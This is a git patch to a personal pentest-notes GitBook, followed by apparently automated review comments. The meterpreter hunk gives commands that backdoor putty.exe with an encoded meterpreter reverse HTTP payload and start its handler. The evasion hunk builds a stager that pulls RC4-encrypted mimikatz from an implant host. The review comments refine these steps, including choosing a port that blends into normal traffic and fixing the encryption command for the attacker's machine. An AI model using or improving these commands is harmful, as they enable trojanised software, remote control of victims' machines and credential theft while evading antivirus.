From 1a9bcdd020cf7d805a53378ac64d02204d551918 Mon Sep 17 00:00:00 2001 From: Sam Freeside Date: Mon, 6 Mar 2023 22:13:49 +0300 Subject: [PATCH] [AHK] Automatic update :alien: --- README.md | 10 ++++++++-- pentest/c2/meterpreter.md | 5 +++-- pentest/infrastructure/ad/av-edr-evasion/README.md | 4 ++-- 3 files changed, 13 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 9a810eb..b6cbcb5 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,9 @@ Hey there! -I'm [snovvcrash](https://snovvcrash.rocks/about) and that's a gitbook for keeping my pentest notes on hand. It's far from being perfect in terms of organization (that's why I call it "promiscuous") and, basically, I'm logging it for myself, but it turned out that hosting it online makes it most convenient to access. So, if you find it handy too, feel free to use it... **responsibly**, of course! +I'm [snovvcrash](https://snovvcrash.rocks/about) and I do ethical penetration testing, red teaming, offensive tooling developement and cybersecurity researching. + +This is a GitBook of mine whose purpose is keeping my pentest notes on hand. It's far from being perfect in terms of organization (that's why I call it "promiscuous") and, basically, I'm logging it for myself, but it turned out that hosting it online makes it most convenient to access. So, if you find it handy too, feel free to use it... **responsibly**, of course! While taking these notes, one main rule is that all the given techniques are actually tested either during a real engagement or in a training lab. 
@@ -12,8 +14,12 @@ While taking these notes, one main rule is that all the given techniques are act **DISCLAIMER.** All information contained in this blog is provided for educational and research purposes only. The author is not responsible for any illegal use of any information published on the pages of this blog. {% endhint %} +{% hint style="success" %} +**SUPPORT.** Private pet projects of mine in offensive tooling are available [for my sponsors](https://boosty.to/snovvcrash). +{% endhint %} + {% hint style="info" %} -Previous version of PPN is ➡️ [here](https://snovvcrash.rocks/PPN/) (deprecated). +**DEPRECATED.** The previous version of PPN is right [here](https://snovvcrash.rocks/PPN/). {% endhint %} ## About diff --git a/pentest/c2/meterpreter.md b/pentest/c2/meterpreter.md index 35d1760..fd06362 100644 --- a/pentest/c2/meterpreter.md +++ b/pentest/c2/meterpreter.md @@ -144,8 +144,9 @@ Backdoored legit executable with delayed Stdapi loading: ``` $ wget https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe -$ msfvenom -p windows/x64/meterpreter_reverse_http LHOST=eth0 LPORT=8088 EXITFUNC=thread -e x64/xor_dynamic -i 10 -k -x putty.exe -f exe -o evilputty.exe -$ sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_http; set LHOST eth0; set LPORT 8088; set AutoLoadStdapi false; set EXITFUNC thread; run' +$ msfvenom -p windows/x64/meterpreter_reverse_http LHOST=eth0 LPORT=8080 EXITFUNC=thread -e x64/xor_dynamic -i 10 -k -x putty.exe -f exe -o evilputty.exe +$ sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_http; set LHOST eth0; set LPORT 8080; set AutoLoadStdapi false; set EXITFUNC thread; run' +meterpreter > load stdapi ``` diff --git a/pentest/infrastructure/ad/av-edr-evasion/README.md b/pentest/infrastructure/ad/av-edr-evasion/README.md index 751d83b..8ae77fa 100644 --- a/pentest/infrastructure/ad/av-edr-evasion/README.md 
+++ b/pentest/infrastructure/ad/av-edr-evasion/README.md @@ -335,9 +335,9 @@ mv "C:\Windows\Temp\$target\$obf\bin\Release\$obf.exe" "\\vmware-host\Shared Fol - [https://github.com/hasherezade/libpeconv](https://github.com/hasherezade/libpeconv) ``` -$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv +$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv $ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4 $ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456 $ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337 -Cmd > stager.exe +Cmd > dist\stager.exe ```
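Review bot: typo on the first added line of the first README.md hunk: "offensive tooling developement" should be "offensive tooling development", and "cybersecurity researching" reads more naturally as "cybersecurity research". Suggested line: `+I'm [snovvcrash](https://snovvcrash.rocks/about) and I do ethical penetration testing, red teaming, offensive tooling development and cybersecurity research.`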
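Review bot: the LPORT change from 8088 to 8080 in the meterpreter.md hunk has no rationale in the commit message ("Automatic update") and nothing else in the snippet depends on it; if the intent is that 8080 blends in better with ordinary HTTP traffic, say so in the text, otherwise leave the port alone. On the same two lines, `sudo msfconsole` is unnecessary privilege: both 8088 and 8080 are unprivileged ports, so the handler binds them fine as a normal user. The added `meterpreter > load stdapi` line is the right complement to `set AutoLoadStdapi false`; consider a one-line remark that Stdapi commands such as `sysinfo` and `getuid` are unavailable until it runs, since delayed Stdapi loading is the point of this snippet.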
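Review bot: the unchanged `openssl enc -rc4 ...` line in the av-edr-evasion hunk fails on OpenSSL 3.x (error setting cipher RC4) because RC4 was moved to the legacy provider; since this hunk already touches the block to add `&& cd stager_libpeconv`, it is a good moment to add `-provider legacy -provider default` to that command, or a note to that effect, so the walkthrough works on a current attacker host. The `Cmd > dist\stager.exe` change also leaves it ambiguous whether `Cmd >` is the Windows prompt on the target or an interactive prompt of `socket_binary_server.py`; a short note on which host that line is typed on, and that `dist\` is the output directory of `make stager`, would remove the guesswork.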